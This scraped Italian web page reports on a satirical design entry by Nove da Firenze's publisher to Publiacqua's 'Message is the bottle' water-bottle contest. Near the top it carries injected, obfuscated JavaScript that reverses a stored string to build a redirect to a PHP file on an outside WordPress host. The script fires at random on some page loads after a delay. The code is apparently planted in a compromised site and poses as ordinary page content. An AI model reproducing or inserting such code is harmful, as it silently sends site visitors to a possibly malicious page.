Nove da Firenze vincitore morale del Concorso "Message is the bottle" di Publiacqua

image_pdfimage_print
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/10/acqua-di-firenze.jpg”>
Il progetto vincitore "morale" del concorso di Publiacqua

Publiacqua ha bandito il concorso “Message is the bottle”. Qui i il progetto presentato dall’associazione Comunicazione Democratica, editrice di Nove da Firenze, che ha coinvolto il designer Luciano Curatolo per dissacrare l’iniziativa promozionale della ex municipalizzata che ha privatizzato, con la complicità delle amministrazioni locali, l’acqua di Firenze.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *